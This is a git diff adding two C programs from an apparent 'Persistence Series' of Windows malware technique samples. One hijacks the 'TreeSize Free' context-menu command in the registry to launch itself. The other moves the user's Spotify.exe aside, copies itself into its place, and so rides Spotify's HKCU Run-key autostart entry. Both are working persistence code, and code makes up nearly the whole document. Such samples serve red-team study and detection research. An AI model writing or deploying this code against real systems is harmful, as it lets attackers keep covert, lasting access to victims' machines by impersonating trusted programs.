diff --git a/The Persistence Series/Commandeering Context Menu Entries/CommandeeringContextMenuEntries.c b/The Persistence Series/Commandeering Context Menu Entries/CommandeeringContextMenuEntries.c new file mode 100644 index 0000000..0ae376a --- /dev/null +++ b/The Persistence Series/Commandeering Context Menu Entries/CommandeeringContextMenuEntries.c @@ -0,0 +1,200 @@ +#include +#include +#include + +#define WCHAR_MAXPATH (MAX_PATH * sizeof(WCHAR)) + +DWORD HijackContextMenu(VOID); +BOOL DoIExist(VOID); + +int main(VOID) +{ + DWORD dwReturn = ERROR_SUCCESS; + dwReturn = HijackContextMenu(); + + if (dwReturn != ERROR_SUCCESS && dwReturn != ERROR_FILE_EXISTS) + { + return dwReturn; + } + + if (DoIExist()) + { + MessageBoxA(NULL, "", "", MB_OK); + ExitProcess(GetLastError()); + } + + while (TRUE) + { + Sleep(1000); + } + + return ERROR_SUCCESS; +} + +BOOL DoIExist(VOID) +{ + DWORD dwProcesses[1024] = { 0 }; + WCHAR wPath[WCHAR_MAXPATH] = { 0 }; + DWORD wPathSize = WCHAR_MAXPATH; + DWORD dwNeeded = 0; + DWORD dwProcess = 0; + DWORD dwCount = 0; + + if (!EnumProcesses(dwProcesses, sizeof(dwProcesses), &dwNeeded)) + { + return FALSE; + } + + if (GetModuleFileName(NULL, wPath, wPathSize) == 0) + { + return FALSE; + } + + dwProcess = dwNeeded / sizeof(DWORD); + for (DWORD dwIndex = 0; dwIndex < dwProcess; dwIndex++) + { + WCHAR wModule[WCHAR_MAXPATH] = { 0 }; + if (dwProcesses[dwIndex] != 0) + { + DWORD dwId = dwProcesses[dwIndex]; + HANDLE hHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwId); + if (hHandle != NULL) + { + HMODULE hMod; + DWORD dwSize; + + if (EnumProcessModules(hHandle, &hMod, sizeof(hMod), &dwSize)) + { + GetModuleBaseName(hHandle, hMod, wModule, (sizeof(wModule) / sizeof(WCHAR))); + + if (wcsstr(wPath, wModule) != NULL) + { + dwCount++; + if (dwCount > 1) + { + return TRUE; + } + } + + } + } + + if (hHandle) + { + CloseHandle(hHandle); + } + } + } + + return FALSE; +} + + + +DWORD HijackContextMenu(VOID) +{ + HKEY hKey = HKEY_CLASSES_ROOT; + WCHAR lpSubKey[WCHAR_MAXPATH] = L"Directory\\Background\\shell"; + HKEY hOpenKey = NULL; + HKEY phkResult; + DWORD dwSubKeys; + + if (RegOpenKeyEx(hKey, lpSubKey, 0, KEY_ALL_ACCESS, &phkResult) != ERROR_SUCCESS) + { + return GetLastError(); + } + + if (RegQueryInfoKey(phkResult, NULL, NULL, NULL, &dwSubKeys, NULL, NULL, NULL, NULL, NULL, NULL, NULL) != ERROR_SUCCESS) + { + goto EXIT_ROUTINE; + } + + for (DWORD i = 0; i < dwSubKeys; i++) + { + DWORD Enum; + WCHAR lpName[WCHAR_MAXPATH] = { 0 }; + WCHAR lpFullName[WCHAR_MAXPATH] = { 0 }; + DWORD lpcchName = WCHAR_MAXPATH; + hOpenKey = 0; + WCHAR bValue[WCHAR_MAXPATH] = L"CALC.EXE"; + WCHAR pvData[2048] = { 0 }; + WCHAR wModulePath[WCHAR_MAXPATH] = { 0 }; + + Enum = RegEnumKeyExW(phkResult, i, lpName, &lpcchName, NULL, NULL, NULL, NULL); + + if (Enum != ERROR_SUCCESS && Enum != ERROR_NO_MORE_ITEMS) + { + goto EXIT_ROUTINE; + } + + if (wcsstr(lpName, L"TreeSize Free") != NULL) + { + wcscat(lpName, L"\\command"); + if (RegOpenKeyEx(phkResult, lpName, 0, KEY_ALL_ACCESS, &hOpenKey) != ERROR_SUCCESS) + { + goto EXIT_ROUTINE; + } + + Enum = 2048; + if (RegGetValue(hOpenKey, NULL, NULL, RRF_RT_REG_SZ, NULL, pvData, &Enum) != ERROR_SUCCESS) + { + goto EXIT_ROUTINE; + } + + if (GetModuleFileName(NULL, bValue, WCHAR_MAXPATH) == 0) + { + goto EXIT_ROUTINE; + } + + if (wcscmp(bValue, pvData) == ERROR_SUCCESS) + { + if (phkResult) + { + RegCloseKey(phkResult); + } + + if (hOpenKey) + { + RegCloseKey(hOpenKey); + } + + return ERROR_FILE_EXISTS; + } + + if (RegSetValueEx(hOpenKey, NULL, 0, REG_SZ, (PBYTE)bValue, sizeof(bValue)) != ERROR_SUCCESS) + { + goto EXIT_ROUTINE; + } + + if (hOpenKey) + { + RegCloseKey(hOpenKey); + } + + break; + } + + } + + if (phkResult) + { + RegCloseKey(phkResult); + } + + return ERROR_SUCCESS; + +EXIT_ROUTINE: + + if (phkResult) + { + RegCloseKey(phkResult); + } + + if (hOpenKey) + { + RegCloseKey(hOpenKey); + } + + return GetLastError(); + +} \ No newline at end of file diff --git a/The Persistence Series/Commandeering Context Menu Entries/CommandeeringContextMenuEntries.pdf b/The Persistence Series/Commandeering Context Menu Entries/CommandeeringContextMenuEntries.pdf new file mode 100644 index 0000000..6139671 Binary files /dev/null and b/The Persistence Series/Commandeering Context Menu Entries/CommandeeringContextMenuEntries.pdf differ diff --git a/The Persistence Series/Masquerading the HKCU Run Key/MasqueradingtheHKCURunKey.c b/The Persistence Series/Masquerading the HKCU Run Key/MasqueradingtheHKCURunKey.c new file mode 100644 index 0000000..4a8d910 --- /dev/null +++ b/The Persistence Series/Masquerading the HKCU Run Key/MasqueradingtheHKCURunKey.c @@ -0,0 +1,115 @@ +#include +#include + +#define WCHAR_MAXPATH (MAX_PATH * sizeof(WCHAR)) + + +DWORD MasqueradeSpotifyKey(VOID); + + +int main(VOID) +{ + DWORD dwError = ERROR_SUCCESS; + WCHAR wModulePath[WCHAR_MAXPATH] = { 0 }; + + if (GetModuleFileNameW(NULL, wModulePath, WCHAR_MAXPATH) == 0) + goto FAILURE; + + if (wcsstr(wModulePath, L"Spotify") == NULL) + { + if (MasqueradeSpotifyKey() != ERROR_SUCCESS) + goto FAILURE; + } + else + MessageBoxA(NULL, "", "", MB_OK); + + return ERROR_SUCCESS; + +FAILURE: + + dwError = GetLastError(); + + return dwError; +} + +DWORD MasqueradeSpotifyKey(VOID) +{ + DWORD dwError = ERROR_SUCCESS; + WCHAR wModulePath[WCHAR_MAXPATH] = { 0 }, wNewPath[WCHAR_MAXPATH] = { 0 }; + WCHAR wRegistryPath[WCHAR_MAXPATH] = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run"; + HKEY hKey = NULL, hHive = HKEY_CURRENT_USER; + BOOL bFlag = FALSE; + + dwError = (LRESULT)RegOpenKeyExW(hHive, wRegistryPath, 0, KEY_ALL_ACCESS, &hKey); + if (dwError != ERROR_SUCCESS) + goto FAILURE; + + for (; dwError < 256; dwError++) + { + DWORD dwReturn = 0, lpType = 0, dwValueSize = WCHAR_MAXPATH, dwDataSize = WCHAR_MAXPATH; + BYTE lpData[WCHAR_MAXPATH] = { 0 }; + WCHAR wString[WCHAR_MAXPATH] = { 0 }; + WCHAR lpValue[WCHAR_MAXPATH] = { 0 }; + + dwReturn = (LSTATUS)RegEnumValueW(hKey, dwError, lpValue, &dwValueSize, NULL, &lpType, lpData, &dwDataSize); + if (dwReturn != ERROR_SUCCESS && dwError != ERROR_NO_MORE_ITEMS) + goto FAILURE; + + if (lpType != REG_SZ) + continue; + + swprintf(wString, L"%ws", lpData); + + if (wcsstr(wString, L"Spotify") != NULL) + { + bFlag = TRUE; + break; + } + } + + if (!bFlag) + { + SetLastError(ERROR_FILE_NOT_FOUND); + goto FAILURE; + } + + if (GetEnvironmentVariableW(L"APPDATA", wModulePath, WCHAR_MAXPATH) == 0) + goto FAILURE; + + wcscat(wModulePath, L"\\Spotify\\Spotify.exe"); + + if (GetEnvironmentVariableW(L"APPDATA", wNewPath, WCHAR_MAXPATH) == 0) + goto FAILURE; + + wcscat(wNewPath, L"\\Spotify\\RealSpotify.exe"); + + if (!MoveFile(wModulePath, wNewPath)) + goto FAILURE; + + ZeroMemory(wModulePath, WCHAR_MAXPATH); ZeroMemory(wNewPath, WCHAR_MAXPATH); + + if (GetModuleFileNameW(NULL, wModulePath, WCHAR_MAXPATH) == 0) + goto FAILURE; + + if (GetEnvironmentVariableW(L"APPDATA", wNewPath, WCHAR_MAXPATH) == 0) + goto FAILURE; + + wcscat(wNewPath, L"\\Spotify\\Spotify.exe"); + + if (!CopyFile(wModulePath, wNewPath, TRUE)) + goto FAILURE; + + if (hKey) + RegCloseKey(hKey); + + return ERROR_SUCCESS; + +FAILURE: + + dwError = GetLastError(); + + if (hKey) + RegCloseKey(hKey); + + return dwError; +} \ No newline at end of file diff --git a/The Persistence Series/Masquerading the HKCU Run Key/MasqueradingtheHKCURunKey.pdf b/The Persistence Series/Masquerading the HKCU Run Key/MasqueradingtheHKCURunKey.pdf new file mode 100644 index 0000000..ee87630 Binary files /dev/null and b/The Persistence Series/Masquerading the HKCU Run Key/MasqueradingtheHKCURunKey.pdf differ